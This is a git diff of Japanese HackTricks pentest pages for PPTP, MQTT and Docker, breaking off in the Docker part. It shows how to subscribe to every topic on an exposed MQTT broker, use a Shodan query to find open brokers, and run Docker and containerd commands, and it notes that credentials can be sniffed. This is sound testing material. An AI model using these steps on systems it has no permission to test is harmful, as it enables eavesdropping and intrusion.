<summary><strong>htARTE(HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でAWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- **HackTricksで企業を宣伝したい**か**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- [**公式PEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を入手する
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローする
|
||||
- **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗聴マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗聴マルウェア**によって**侵害**されていないかを確認する**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
|
||||
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -30,7 +30,7 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
## 基本情報
|
||||
|
||||
**ポイントツーポイントトンネリングプロトコル(PPTP)**は、モバイルデバイスへの**リモートアクセス**に広く使用される方法です。鍵の交換には**TCPポート1723**が使用され、データの暗号化には**IPプロトコル47**(ジェネリックルーティングカプセル化、または**GRE**)が使用され、ピア間で送信されるデータが暗号化されます。このセットアップは、インターネット上で安全な通信チャネルを確立するために重要であり、交換されるデータが機密保持され、未承認のアクセスから保護されることを保証します。
|
||||
**Point-to-Point Tunneling Protocol(PPTP)**は、モバイルデバイスへの**リモートアクセス**に広く使用される方法です。鍵の交換には**TCPポート1723**が使用され、データの暗号化には**IPプロトコル47**(一般的なルーティングカプセル化、または**GRE**)が使用され、ピア間で送信されるデータが暗号化されます。このセットアップは、インターネット上で安全な通信チャネルを確立するために重要であり、交換されるデータが機密保持され、未承認のアクセスから保護されることを保証します。
|
||||
|
||||
**デフォルトポート**:1723
|
||||
|
||||
|
@ -54,6 +54,6 @@ HackTricksをサポートする他の方法:
|
|||
* [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を手に入れる
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)で**フォロー**する。
|
||||
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
|
||||
* **HackTricks**および**HackTricks Cloud**のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,28 +1,28 @@
|
|||
# 1883 - MQTT(Mosquitto)のペンテスト
|
||||
# 1883 - MQTTのペンテスト(Mosquitto)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>**htARTE(HackTricks AWS Red Team Expert)**でAWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE(HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>を通じてゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)をフォローする
|
||||
- **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
|
||||
- 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)で**フォロー**する。
|
||||
- **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する。
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、**盗難マルウェア**による企業や顧客の**侵害**をチェックするための**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
彼らのウェブサイトをチェックして、彼らのエンジンを**無料**で試すことができます:
|
||||
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -30,7 +30,7 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
## 基本情報
|
||||
|
||||
**MQ Telemetry Transport(MQTT)**は、**パブリッシュ/サブスクライブメッセージングプロトコル**として知られ、その極端な単純さと軽さが特徴です。このプロトコルは、デバイスが能力が限られており、低帯域幅、高遅延、または信頼性の低い接続が特徴のネットワーク上で動作する環境に特に適しています。MQTTの主な目標は、ネットワーク帯域幅の使用を最小限に抑え、デバイスリソースの需要を削減することです。さらに、信頼性のある通信を維持し、一定レベルの配信保証を提供することを目指しています。これらの目標により、MQTTは**機械間通信(M2M)**および**モノのインターネット(IoT)**の急成長する分野に非常に適しており、効率的に多くのデバイスを接続することが不可欠です。さらに、MQTTは、帯域幅とバッテリー寿命を節約することが重要なモバイルアプリケーションに非常に有益です。
|
||||
**MQ Telemetry Transport(MQTT)**は、**パブリッシュ/サブスクライブメッセージングプロトコル**として知られ、その極端な単純さと軽さが特徴です。このプロトコルは、デバイスが能力が限られており、低帯域幅、高遅延、または信頼性の低い接続が特徴付けられるネットワーク上で動作する環境に特化しています。MQTTの主な目標は、ネットワーク帯域幅の使用を最小限に抑え、デバイスリソースへの需要を削減することです。さらに、信頼性のある通信を維持し、一定レベルの配信保証を提供することを目指しています。これらの目標により、MQTTは**機械間通信(M2M)**および**モノのインターネット(IoT)**の急成長分野に非常に適しており、効率的に多くのデバイスを接続することが不可欠です。さらに、帯域幅とバッテリー寿命の節約が重要なモバイルアプリケーションにとって、MQTTは非常に有益です。
|
||||
|
||||
**デフォルトポート:** 1883
|
||||
```
|
||||
|
@ -39,7 +39,7 @@ PORT STATE SERVICE REASON
|
|||
```
|
||||
## トラフィックの検査
|
||||
|
||||
MQTTブローカーが**CONNECT**パケットを受信すると、**CONNACK**パケットが返されます。このパケットには接続状態を理解するために重要な戻りコードが含まれています。**0x00**の戻りコードは、資格情報が受け入れられたことを示し、成功した接続を意味します。一方、**0x05**の戻りコードは、資格情報が無効であることを示し、したがって接続を防ぎます。
|
||||
MQTTブローカーが**CONNECT**パケットを受信すると、**CONNACK**パケットが送信されます。このパケットには接続状態を理解するために重要な戻り値が含まれています。**0x00**の戻り値は、資格情報が受け入れられたことを示し、接続が成功したことを意味します。一方、**0x05**の戻り値は、資格情報が無効であることを示し、したがって接続を防ぎます。
|
||||
|
||||
たとえば、ブローカーが無効な資格情報のために接続を拒否する場合、シナリオは次のようになります:
|
||||
```
|
||||
|
@ -52,19 +52,17 @@ MQTTブローカーが**CONNECT**パケットを受信すると、**CONNACK**パ
|
|||
|
||||
### [**Brute-Force MQTT**](../generic-methodologies-and-resources/brute-force.md#mqtt)
|
||||
|
||||
## MQTTのPentesting
|
||||
## MQTTのペンテスト
|
||||
|
||||
**認証は完全にオプション**であり、認証が行われていても**デフォルトでは暗号化されていません**(資格情報は平文で送信されます)。MITM攻撃はまだ実行可能で、パスワードを盗むことができます。
|
||||
**認証は完全にオプション**であり、認証が行われていても**デフォルトでは暗号化されていません**(資格情報は平文で送信されます)。MITM攻撃は依然として実行可能で、パスワードを盗むことができます。
|
||||
|
||||
MQTTサービスに接続するには、[https://github.com/bapowell/python-mqtt-client-shell](https://github.com/bapowell/python-mqtt-client-shell)を使用し、次のようにすべてのトピックに自分自身をサブスクライブできます:
|
||||
MQTTサービスに接続するには、[https://github.com/bapowell/python-mqtt-client-shell](https://github.com/bapowell/python-mqtt-client-shell)を使用して、次の操作を行います。
|
||||
```
|
||||
> connect (NOTICE that you need to indicate before this the params of the connection, by default 127.0.0.1:1883)
|
||||
> subscribe "#" 1
|
||||
> subscribe "$SYS/#"
|
||||
```
|
||||
You could also use [**https://github.com/akamai-threat-research/mqtt-pwn**](https://github.com/akamai-threat-research/mqtt-pwn)
|
||||
|
||||
You can also use:
|
||||
あなたは[**https://github.com/akamai-threat-research/mqtt-pwn**](https://github.com/akamai-threat-research/mqtt-pwn)を使用することもできます。
|
||||
```bash
|
||||
apt-get install mosquitto mosquitto-clients
|
||||
mosquitto_sub -t 'test/topic' -v #Subscribe to 'test/topic'
|
||||
|
@ -99,54 +97,54 @@ client.loop_start()
|
|||
if __name__ == "__main__":
|
||||
main()
|
||||
```
|
||||
## より詳しい情報
|
||||
## もっと情報
|
||||
|
||||
こちらから: [https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b](https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b)
|
||||
|
||||
### パブリッシュ/サブスクライブ パターン <a href="#b667" id="b667"></a>
|
||||
### パブリッシュ/サブスクライブパターン <a href="#b667" id="b667"></a>
|
||||
|
||||
パブリッシュ/サブスクライブモデルは以下で構成されています:
|
||||
|
||||
* **パブリッシャー**: ブローカー内の1つ以上のトピックにメッセージを公開します。
|
||||
* **サブスクライバー**: ブローカー内の1つ以上のトピックに購読し、パブリッシャーから送信されたすべてのメッセージを受信します。
|
||||
* **ブローカー**: パブリッシャーからのすべてのメッセージをサブスクライバーにルーティングします。
|
||||
* **トピック**: 1つ以上のレベルで構成され、スラッシュで区切られたものです (例: /smartshouse/livingroom/temperature)。
|
||||
- **パブリッシャー**: メッセージをブローカー内の1つ(または複数)のトピックに公開します。
|
||||
- **サブスクライバー**: ブローカー内の1つ(または複数)のトピックにサブスクライブし、パブリッシャーから送信されたすべてのメッセージを受信します。
|
||||
- **ブローカー**: パブリッシャーからのすべてのメッセージをサブスクライバーにルーティングします。
|
||||
- **トピック**: 1つ以上のレベルで構成され、スラッシュ(例: /smartshouse/livingroom/temperature)で区切られています。
|
||||
|
||||
### パケット形式 <a href="#f15a" id="f15a"></a>
|
||||
|
||||
すべてのMQTTパケットには固定ヘッダーが含まれています (図02)。図02: 固定ヘッダー
|
||||
すべてのMQTTパケットには固定ヘッダーが含まれています(図02)。図02: 固定ヘッダー
|
||||
|
||||
![https://miro.medium.com/max/838/1\*k6RkAHEk0576geQGUcKSTA.png](https://miro.medium.com/max/838/1\*k6RkAHEk0576geQGUcKSTA.png)
|
||||
|
||||
### パケットタイプ
|
||||
|
||||
* CONNECT (1): クライアントがサーバーへの接続を要求するために開始されます。
|
||||
* CONNACK (2): 成功した接続のサーバーからの確認です。
|
||||
* PUBLISH (3): クライアントからサーバー、またはその逆にメッセージを送信するために使用されます。
|
||||
* PUBACK (4): PUBLISHパケットの確認です。
|
||||
* PUBREC (5): メッセージが受信されたことを確認するメッセージ配信プロトコルの一部です。
|
||||
* PUBREL (6): メッセージ配信のさらなる確認で、メッセージリリースを示します。
|
||||
* PUBCOMP (7): メッセージ配信プロトコルの最終部分で、完了を示します。
|
||||
* SUBSCRIBE (8): クライアントがトピックからのメッセージを聞くためのリクエストです。
|
||||
* SUBACK (9): SUBSCRIBEリクエストのサーバーからの確認です。
|
||||
* UNSUBSCRIBE (10): クライアントがトピックからのメッセージの受信を停止するためのリクエストです。
|
||||
* UNSUBACK (11): UNSUBSCRIBEリクエストへのサーバーの応答です。
|
||||
* PINGREQ (12): クライアントが送信するハートビートメッセージです。
|
||||
* PINGRESP (13): ハートビートメッセージへのサーバーの応答です。
|
||||
* DISCONNECT (14): クライアントが接続を終了するために開始します。
|
||||
* 0と15の2つの値は予約されており、使用が禁止されています。
|
||||
- CONNECT (1): クライアントがサーバーに接続を要求するためにイニシエートされます。
|
||||
- CONNACK (2): 接続が成功したことを示すサーバーの確認。
|
||||
- PUBLISH (3): クライアントからサーバー、またはその逆にメッセージを送信するために使用されます。
|
||||
- PUBACK (4): PUBLISHパケットの確認。
|
||||
- PUBREC (5): メッセージが受信されたことを確認するメッセージ配信プロトコルの一部。
|
||||
- PUBREL (6): メッセージ配信のさらなる確認で、メッセージリリースを示します。
|
||||
- PUBCOMP (7): メッセージ配信プロトコルの最終部分で、完了を示します。
|
||||
- SUBSCRIBE (8): クライアントがトピックからのメッセージを聞くためのリクエスト。
|
||||
- SUBACK (9): SUBSCRIBEリクエストのサーバーの確認。
|
||||
- UNSUBSCRIBE (10): クライアントがトピックからのメッセージの受信を停止するためのリクエスト。
|
||||
- UNSUBACK (11): UNSUBSCRIBEリクエストへのサーバーの応答。
|
||||
- PINGREQ (12): クライアントが送信するハートビートメッセージ。
|
||||
- PINGRESP (13): ハートビートメッセージへのサーバーの応答。
|
||||
- DISCONNECT (14): クライアントが接続を終了するためにイニシエートされます。
|
||||
- 0と15の2つの値は予約されており、使用が禁止されています。
|
||||
|
||||
## Shodan
|
||||
|
||||
* `port:1883 MQTT`
|
||||
- `port:1883 MQTT`
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかを確認するための**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
|
||||
|
||||
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
|
||||
|
||||
|
@ -154,14 +152,14 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**</strong>と一緒に**ゼロからヒーローまでAWSハッキングを学ぶ**</summary>
|
||||
<summary><strong>htARTE(HackTricks AWS Red Team Expert)で**ゼロからヒーローまでのAWSハッキング**を学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れる
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つける
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**をフォロー**してください。
|
||||
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
|
||||
- **HackTricksで企業を宣伝**したい場合や**PDFでHackTricksをダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を手に入れる
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つける
|
||||
- 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**をフォロー**してください。
|
||||
- **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,24 +1,24 @@
|
|||
# 2375, 2376 Dockerの侵入テスト
|
||||
# 2375, 2376 Dockerのペンテスト
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>htARTE(HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>を通じてゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
- **Discordグループ**に**参加**する💬(https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**🐦で**フォロー**する[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
|
||||
- **HackTricks**(https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
|
||||
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)をフォローする
|
||||
- **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、**盗難マルウェア**による企業や顧客の**侵害**をチェックする**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
|
@ -32,15 +32,15 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
#### 何を指すか
|
||||
|
||||
Dockerは**コンテナ化業界**の**最前線プラットフォーム**であり、**継続的な革新**を牽引しています。これにより、**伝統的なものから未来志向のアプリケーション**の簡単な作成と配布が可能となり、さまざまな環境での**安全な展開**が保証されます。
|
||||
Dockerは、**コンテナ化業界**の**最前線プラットフォーム**であり、**継続的な革新**を牽引しています。これにより、**伝統的から未来志向まで**のアプリケーションの簡単な作成と配布が可能となり、異なる環境での**安全な展開**が保証されます。
|
||||
|
||||
#### 基本的なDockerアーキテクチャ
|
||||
|
||||
- [**containerd**](http://containerd.io):これはコンテナの**ライフサイクルの包括的な管理**を担当する**コアランタイム**であり、**イメージの転送と保存**、さらにはコンテナの**実行、監視、ネットワーキング**を取り扱います。containerdに関する**詳細な洞察**は**さらに探求**されます。
|
||||
- [**containerd**](http://containerd.io): これはコンテナの**ライフサイクルの包括的な管理**を担当する**コアランタイム**であり、**イメージの転送と保存**、さらにはコンテナの**実行、監視、ネットワーキング**を取り扱います。containerdに関する**詳細な洞察**が**さらに探求**されています。
|
||||
- **コンテナシム**は、**ヘッドレスコンテナ**の取り扱いにおいて**中間者**として重要な役割を果たし、コンテナが初期化された後に**runc**からシームレスに引き継ぎます。
|
||||
- [**runc**](http://runc.io):その**軽量で汎用的なコンテナランタイム**機能で高く評価されており、OCI標準に準拠しています。これは、**OCIガイドライン**に従ってコンテナを**開始および管理**するためにcontainerdによって使用され、元の**libcontainer**から進化しました。
|
||||
- [**grpc**](http://www.grpc.io)は、containerdと**dockerエンジン**の間の**効率的な相互作用**を確保するために不可欠であり、**通信**を**容易に**します。
|
||||
- [**OCI**](https://www.opencontainers.org)は、最新のDockerバージョンが**OCIイメージおよびランタイム**標準の両方に**準拠**している**OCI仕様**を維持する上で重要です。
|
||||
- [**runc**](http://runc.io): **軽量で汎用性のあるコンテナランタイム**機能で高く評価されており、runcは**OCI標準**に準拠しています。これは、**OCIガイドライン**に従ってコンテナを**開始および管理**するためにcontainerdによって使用され、元の**libcontainer**から進化しました。
|
||||
- [**grpc**](http://www.grpc.io)は、containerdと**dockerエンジン**の間の**効率的な相互作用**を確保するために不可欠です。
|
||||
- [**OCI**](https://www.opencontainers.org)は、ランタイムとイメージの**OCI仕様**を維持する上で重要であり、最新のDockerバージョンは**OCIイメージおよびランタイム**標準の両方に**準拠**しています。
|
||||
|
||||
#### 基本的なコマンド
|
||||
```bash
|
||||
|
@ -67,11 +67,11 @@ docker system prune -a
|
|||
```
|
||||
#### Containerd
|
||||
|
||||
**Containerd**は、**DockerやKubernetes**などのコンテナプラットフォームのニーズを満たすために特に開発されました。これは、Linux、Windows、Solarisなどのさまざまなオペレーティングシステムでのコンテナの実行を**簡素化**することを目指しており、オペレーティングシステム固有の機能とシステムコールを抽象化しています。Containerdの目標は、ユーザーが必要とする基本的な機能のみを含め、不要なコンポーネントを省略することです。ただし、この目標を完全に達成することは困難であると認識されています。
|
||||
**Containerd**は、**DockerやKubernetes**などのコンテナプラットフォームのニーズを満たすために特別に開発されました。これは、Linux、Windows、Solarisなどのさまざまなオペレーティングシステム上でコンテナの実行を**簡素化**することを目指しており、オペレーティングシステム固有の機能とシステムコールを抽象化しています。Containerdの目標は、ユーザーが必要とする基本的な機能のみを含め、不要なコンポーネントを省略することです。ただし、この目標を完全に達成することは困難であると認識されています。
|
||||
|
||||
重要な設計上の決定の1つは、**Containerdがネットワーキングを処理しない**ということです。ネットワーキングは、ソフトウェア定義ネットワーキング(SDN)やサービスディスカバリなどの複雑さがあり、プラットフォームによって大きく異なる要素と見なされます。そのため、Containerdはネットワーキングの側面をサポートするプラットフォームに管理させることにしています。
|
||||
重要な設計上の決定の1つは、**Containerdがネットワーキングを処理しない**ということです。ネットワーキングは、分散システムにおいて重要な要素と見なされ、Software Defined Networking(SDN)やサービスディスカバリなどの複雑さが、プラットフォームによって大きく異なります。そのため、Containerdはネットワーキングの側面をサポートするプラットフォームに管理させることにしています。
|
||||
|
||||
**DockerはContainerdを利用**してコンテナを実行しますが、ContainerdはDockerの機能の一部しかサポートしていないことに注意することが重要です。具体的には、ContainerdにはDockerに存在するネットワーク管理機能が欠けており、Dockerスワームの直接的な作成をサポートしていません。この違いは、Containerdがコンテナランタイム環境としての専門的な機能をプラットフォームに委任し、より専門化された機能を提供することを強調しています。
|
||||
**DockerはContainerdを利用**してコンテナを実行しますが、ContainerdはDockerの機能の一部しかサポートしていないことに注意することが重要です。具体的には、ContainerdにはDockerに存在するネットワーク管理機能が欠けており、Dockerスワームの直接的な作成をサポートしていません。この違いは、Containerdがコンテナランタイム環境としての専門的な機能をプラットフォームに委任し、より専門的な機能を提供することを強調しています。
|
||||
```bash
|
||||
#Containerd CLI
|
||||
ctr images pull --skip-verify --plain-http registry:5000/alpine:latest #Get image
|
||||
|
@ -89,15 +89,15 @@ ctr container delete <containerName>
|
|||
```
|
||||
#### Podman
|
||||
|
||||
**Podman**は、Red Hatによって開発および維持されている、[Open Container Initiative (OCI)の標準](https://github.com/opencontainers)に準拠したオープンソースのコンテナエンジンです。Dockerとは異なり、**デーモンレスアーキテクチャ**と**rootlessコンテナ**のサポートなど、いくつかの独自の機能を備えています。これにより、ユーザーはroot権限なしでコンテナを実行できます。
|
||||
**Podman**は、Red Hatによって開発および維持されている、[Open Container Initiative (OCI)の標準](https://github.com/opencontainers)に準拠したオープンソースのコンテナエンジンです。**デーモンレスアーキテクチャ**と**rootlessコンテナ**のサポートなど、いくつかの独自の機能により、Dockerとは異なる特徴を持っています。これにより、ユーザーはroot権限なしでコンテナを実行できます。
|
||||
|
||||
PodmanはDockerのAPIと互換性があり、Docker CLIコマンドを使用できます。この互換性は、コンテナイメージのビルドに使用される**Buildah**や、プッシュ、プル、およびインスペクトなどのイメージ操作を行う**Skopeo**などのツールを含むエコシステムにも適用されます。これらのツールの詳細については、[GitHubページ](https://github.com/containers/buildah/tree/master/docs/containertools)で確認できます。
|
||||
PodmanはDockerのAPIと互換性があり、Docker CLIコマンドを使用できます。この互換性は、コンテナイメージのビルドに使用される**Buildah**や、プッシュ、プル、およびインスペクトなどのイメージ操作に使用される**Skopeo**などのツールを含むエコシステムにも適用されます。これらのツールの詳細については、[GitHubページ](https://github.com/containers/buildah/tree/master/docs/containertools)で確認できます。
|
||||
|
||||
**主な違い**
|
||||
|
||||
* **アーキテクチャ**:Dockerのクライアントサーバーモデルとは異なり、Podmanはデーモンなしで動作します。この設計により、コンテナは起動したユーザーの権限で実行されるため、rootアクセスが不要となり、セキュリティが向上します。
|
||||
* **Systemd統合**:Podmanは**systemd**と統合されており、systemdユニットを介してコンテナを管理できます。これは、Dockerが主にDockerデーモンプロセスを管理するためにsystemdを使用するのとは対照的です。
|
||||
* **Rootlessコンテナ**:Podmanの重要な機能の1つは、コンテナを起動したユーザーの権限で実行できることです。このアプローチにより、攻撃者が侵入したユーザーの権限のみを取得し、rootアクセスを得ることができないため、コンテナ侵害に関連するリスクが最小限に抑えられます。
|
||||
* **Systemd統合**:Podmanはコンテナの管理に**systemd**を統合しており、systemdユニットを介してコンテナを管理できます。これは、Dockerが主にDockerデーモンプロセスを管理するためにsystemdを使用するのとは対照的です。
|
||||
* **Rootlessコンテナ**:Podmanの重要な機能の1つは、コンテナを起動したユーザーの権限でコンテナを実行できることです。このアプローチにより、攻撃者が侵入したユーザーの権限のみを取得し、rootアクセスを得ることができないため、コンテナ侵害に関連するリスクが最小限に抑えられます。
|
||||
|
||||
Podmanのアプローチは、ユーザー権限の管理と既存のDockerワークフローとの互換性を重視した、安全で柔軟なDockerの代替手段を提供しています。
|
||||
|
||||
|
@ -124,7 +124,7 @@ PORT STATE SERVICE
|
|||
|
||||
#### 手動
|
||||
|
||||
